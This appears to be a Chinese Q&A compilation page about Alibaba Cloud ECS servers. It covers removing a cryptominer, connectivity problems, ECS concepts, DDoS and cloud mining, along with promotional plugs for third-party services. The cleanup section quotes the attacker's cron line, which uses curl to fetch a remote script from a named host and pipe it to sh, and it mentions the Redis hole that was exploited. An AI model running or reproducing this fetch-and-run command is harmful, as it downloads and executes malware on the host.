阿里云ecs被挖矿
⑴ 阿里云服务器被挖矿了怎么办(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
⑵ 阿里云无法访问ECS云服务器怎么解决
ECS连不上,可能是多种原因造成的,如以下场景,都可能造成:
1)操作系统出现问题
2)网络配置有问题
3)网络堵塞严重,导致连接中断。
4)操作系统密码被黑客攻陷
你可以登录阿里云管理控制台,了解具体情况,只是阿里云管理控制台太笨重,笔者不是非常推荐。
笔者给你推荐一个很好用的第三方工具:行云服务云管家(yun.cloudbility.com)
你只需要登录云管家,通过你在阿里云管理控制台中获取的Access Key,将你的云主机导入到云管家中,然后有任何问题,都可以在云管家中轻松解决。
举个例子,一旦你觉得ECS连不上,你可以在云管家中直接通过“阿里云管理终端”获取该ECS主机的桌面,这种桌面,既不消耗公网带宽(它消耗的是阿里云内网带宽,这意味着即使网络堵塞严重,你也可以连上),也无论操作系统出现任何问题,都可以进入该主机的系统桌面,然后就可以方便你排错了。
========
如果你要重启ECS,或者你的操作系统密码被黑客黑了,你也可以通过云管家,轻松重启,或者重置密码。
========
你还可通过云管家的体检功能,看一下你的云主机是否被黑客攻击。
总之,阿里云的ECS服务器无法连接,可能是多种原因造成的,需要具体情况具体分析
⑶ ecs的三大资源是什么
云服务器ElasticComputeService(ECS)是阿里云提供的一种基础云计算服务。
使用云服务器ECS就像使用水、电、煤气等资源一样便捷、高效。您无需提前采购硬件设备,而是根据业务需要,随时创建所需数量的云服务器ECS实例。在使用过程中,随着业务的扩展,您可以随时扩容磁盘、增加带宽。如果不再需要云服务器,也能随时释放资源,节省费用。
相关概念
地域和可用区:是指ECS资源所在的物理位置。
镜像:是指ECS实例运行环境的模板,一般包括操作系统和预装的软件。操作系统支持多种Linux发行版本和不同的Windows版本。
块存储:包括基于分布式存储架构的云盘和共享块存储,以及基于物理机本地硬盘的本地存储。
快照:是指某一个时间点上一块弹性块存储的数据备份。
专有网络:基于阿里云构建的一个隔离的网络环境,专有网络之间逻辑上彻底隔离。更多信息,请参考专有网络VPC。
经典网络:统一部署在阿里云公共基础内,规划和管理由阿里云负责。
安全组:由同一地域内具有相同保护需求并相互信任的实例组成,是一种虚拟防火墙,用于设置不同实例的网络访问控制。
⑷ 阿里云允许用云主机挖矿吗
是可以的。很多挖矿项目都可以使用云服务器,例如最近火热的Swarm bzz。但Swarm白皮书没有提供挖矿的硬件配置推荐,然而目前,因为各类硬件采购价格高、到货慢,然而时间不等人!综合对比下来,针对BZZ挖矿,推荐云服务器!
像Swarm BZZ这样的去中心化存储的情况下,以太坊生态中的热点数据每秒都在随时被调用和存储,所以除了CPU、内存和硬盘这三个主要的响应能力之外,还有一个要求宽带传输速度。
使用云服务器来部署bzz节点,核心理由就是一个字“快”,节点早一分钟上线,就能更早的获取到头矿!
经西部数码上千bzz节点部署的实践经验证明,bzz节点需要较高的带宽和超强的磁盘IO性能,以下是结合资源实际消耗情况合理搭配的配置。
4核CPU + 4G内存 + 100G SSD硬盘 + 20M带宽。上述配置,可以部署一个节点。
如果需要部署多节点可以选择多台这样的云服务器,或者选择更高配置的云服务器,如16核CPU + 24G内存 + 500G SSD硬盘 + 200M带宽,可部署5-10个节点。
⑸ 阿里云windows服务器中了挖矿的病毒怎么清理
光删除没用的,因为没有解决好漏洞。
建议是重做系统,然后找护卫神给你做一下系统安全加固,把漏洞彻底堵住才有效果。
⑹ 阿里云ECS服务器对外攻击,怎么解决
服务器被黑了,保存数据,重做系统。服务器
⑺ 云服务器ECS是什么啊
国内由于云概念比较热门儿,所以一般叫云服务器,其实,云服务器和ECS的含义有重复,它他们表达的是同一个意思,只不过一个是中文,一个是英文缩写而已,不过它们在国内资讯网站上经常会连在一直用,有时候也把它称为云主机。
云服务器ecs都有哪些作用呢?
1、完全管理权限:
对云服务器的操作系统有完全控制权,用户可以通过连接管理终端自助解决系统问题,进行各项操作;
2、快照备份与恢复:
对云服务器的磁盘数据生成快照,用户可使用快照回滚、恢复以往磁盘数据,加强数据安全;
3、自定义镜像:
对已安装应用软件包的云服务器,支持自定义镜像、数据盘快照批量创建服务器,简化用户管理部署;
4、拥有API接口:
使用ECS API调用管理,通过安全组功能对一台或多台云服务器进行访问设置,使开发使用更加方便。
⑻ 阿里云ECS服务器被DDoS无解,请问我该何去何从
其实DDoS的核心问题是发起DDoS的成本很低,而防护的的成本非常高。我所了解的,今年国内应该出现了多起超过200G的ddos攻击。国内大部分公司都是扛不住的,当然一般没有深仇大恨或者巨大的商业目的不会发起如此规模的攻击。不过目前打挂一个普通网站有几个G就可以了,攻击成本只需要几百块,防护可能需要几十倍,有的还不一定能防的住。以前我个人的网站被DDOS过,对方就一个G,然后我就被拔网线了。很多IDC出口才几个G,一打就挂,几次下来然后他们就让你搬出机房。貌似阿里云的提供的防护是5G。楼主被黑洞过,我感觉攻击你的流量应该超过10G。自从阿里云公开宣布提供5G免费DDoS防护,国内其他几家做云防护的厂商基本上都把DDoS防护的参数给抹去了,不敢正面比较。你可以了解下安全宝、加速乐的参数和价格情况。DDOS确实是目前互联网非常大的威胁。防护ddos并不是楼主理解的封IP那么简单,要封只能在电信运营商那头在攻击源头封这个IP的流量。如果运营商不封,攻击流量就像洪水一样涌向你的服务器地址,IDC及阿里云是无法阻挡这些流量不涌向他们的。不管怎么样,这些流量是涌进了IDC的大院了,接下来的目标是涌向一个门。IDC要么清洗这些流量继续让被攻击的网站保持正常访问,要么黑洞。ddos防护是要在这些洪水里面分析出那些是正常访问,哪些是恶意攻击,而这个清洗能力是有限的,阿里云提供的是5G,超出太多应该就黑洞了,无限制清洗成本很高也会影响其他阿里云的用户。
另外楼主可能误解了那个可用性了。其实你网站被攻击的时候虚拟机还是在工作的,只是网络被阻塞了。
⑼ 阿里云ECS服务器CPU占用较高时,该如何处理
这种情况可以考虑是被挖矿了,可以找到云市场云顶云寻求帮助,一般这种情况会让工程师进行排查找出问题所在,然后再进行修理,大概的时间一般是三天以内
⑽ 申请了一个ECS,除了建站还能做什么呢
这是什么样的配置?处理能力弱,内存小,磁盘很小(磁盘IO还是很漂亮的哦,对不起,我还是没有取笑它的冲动),带宽小(最大下载速度是120KB / s) 。这听起来不像是会起作用的。不是真的,而是看它的优点:
不用电,24 * 365在线。即使是最小的计算机单元,黑莓派,也需要5w。
最后一个,我不会轻易告诉他们的普通人。嗯,阿里云的带宽上行是不限制(准确来说是独立于下行带宽的很宽松的限制)的,这是啥意思呢?意思就是下载东西的速度很快……